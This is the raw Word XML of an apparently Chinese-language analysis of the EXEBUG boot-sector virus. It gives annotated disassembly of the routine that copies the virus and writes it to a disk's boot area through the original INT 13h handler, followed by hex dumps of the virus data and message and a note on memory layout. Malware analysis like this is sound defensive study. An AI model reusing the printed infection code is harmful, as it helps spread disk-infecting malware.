        <w:t>字节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196 BE1E00        MOV     SI,001E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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS:SI</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:001E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199 BF1E02        MOV     DI,021E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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ES:DI</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:021E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19C F3            REPZ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移动植入代码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9D A4            MOVSB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；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>病毒代码写入感染磁盘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19E B80103        MOV     AX,0301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写磁盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>个扇区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1A1 41            INC     CX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写入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>柱面</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>扇区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1A2 9C            PUSHF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保存当前标志寄存器的值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1A3 FF1E0700      CALL    FAR [0007]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完成正常</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>INT 13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>调用，写盘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；公共处理程序段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1A7 5F            POP     DI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恢复现场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A8 5E            POP     SI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A9 07            POP     ES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AA 5A            POP     DX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AB 59            POP     CX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AC 5B            POP     BX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3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9F80:01AD C3            RET</w:t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ab/>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>；函数运行结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35590" w:rsidRDefault="00F35590" w:rsidP="00F35590">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>六、病毒数据分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35590" w:rsidRDefault="00F35590" w:rsidP="00F35590"/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6.1 BPB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>及病毒数据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00        90 4B 49 44 4C 20-20 20 20 00 02 01 01 00     .KIDL    .....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010  02 E0 00 28</w:t>
      </w:r>
      <w:r w:rsidR="00F92F46">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0B F0 09 00-12 00 02 00 00 00 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>其中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:0003</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>个字节，存储上次调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>INT 13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时，操作系统实时时钟低字高字节的值；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:0007</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>个字节，存储正常</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>INT 13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>入口地址；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:000B</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>个字节，存储感染磁盘号；其他数据为残留的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BPB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>数据。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rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>病毒提示信息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A0                                            20 49                  I</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35590" w:rsidRPr="00F35590" w:rsidRDefault="00F35590" w:rsidP="00F3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35590">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:01B0  20 61 6D 20 4C 69 20 58-69 62 69 6E 21 0D          am Li Xibin!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>七、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EXEBUG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒占用内存空间分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3"/>
    <w:p w:rsidR="006D66C3" w:rsidRPr="0002769C" w:rsidRDefault="006D66C3" w:rsidP="006D66C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124200" cy="34956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6C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50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>1 EXEBUG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>占用内存空间示意</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00340688" w:rsidRPr="006D66C3" w:rsidRDefault="00340688" w:rsidP="006D66C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00340688" w:rsidRPr="006D66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BE6" w:rsidRDefault="008F5BE6" w:rsidP="00EA6C79">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="008F5BE6" w:rsidRDefault="008F5BE6" w:rsidP="00EA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BE6" w:rsidRDefault="008F5BE6" w:rsidP="00EA6C79">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="008F5BE6" w:rsidRDefault="008F5BE6" w:rsidP="00EA6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00"/>
    <w:rsid w:val="0008088F"/>
    <w:rsid w:val="00112CF4"/>
    <w:rsid w:val="00146E1F"/>
    <w:rsid w:val="00172FB1"/>
    <w:rsid w:val="00217660"/>
    <w:rsid w:val="002575F0"/>
    <w:rsid w:val="002B39C8"/>
    <w:rsid w:val="00340688"/>
    <w:rsid w:val="0054070D"/>
    <w:rsid w:val="00546D79"/>
    <w:rsid w:val="00547AF6"/>
    <w:rsid w:val="005738B2"/>
    <w:rsid w:val="005E0F94"/>
    <w:rsid w:val="00660A6E"/>
    <w:rsid w:val="006D66C3"/>
    <w:rsid w:val="006F0110"/>
    <w:rsid w:val="006F355B"/>
    <w:rsid w:val="00761C4D"/>
    <w:rsid w:val="00765A9A"/>
    <w:rsid w:val="00795500"/>
    <w:rsid w:val="008233FD"/>
    <w:rsid w:val="008E100B"/>
    <w:rsid w:val="008F5BE6"/>
    <w:rsid w:val="009D1040"/>
    <w:rsid w:val="00A42C73"/>
    <w:rsid w:val="00AC3D8B"/>
    <w:rsid w:val="00B64742"/>
    <w:rsid w:val="00BC1A24"/>
    <w:rsid w:val="00BC37A4"/>
    <w:rsid w:val="00BE2502"/>
    <w:rsid w:val="00C623C3"/>
    <w:rsid w:val="00CC38F1"/>
    <w:rsid w:val="00E53D1C"/>
    <w:rsid w:val="00E70B74"/>
    <w:rsid w:val="00EA6C79"/>
    <w:rsid w:val="00F35590"/>
    <w:rsid w:val="00F92F46"/>
    <w:rsid w:val="00F966F2"/>
    <w:rsid w:val="00FC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我的正文配置"/>
    <w:qFormat/>
    <w:rsid w:val="002575F0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="微软雅黑" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00EA6C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6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6C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6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6C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A6C79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EA6C7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6C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我的正文配置"/>
    <w:qFormat/>
    <w:rsid w:val="002575F0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="微软雅黑" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00EA6C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6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6C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6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6C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A6C79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EA6C7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6C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56B6-FA3F-4D7F-B5F2-6FB7A136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2</Pages>
  <Words>2360</Words>
  <Characters>13458</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>112</Lines>
  <Paragraphs>31</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>China</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1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7-06-08T06:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-22T12:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>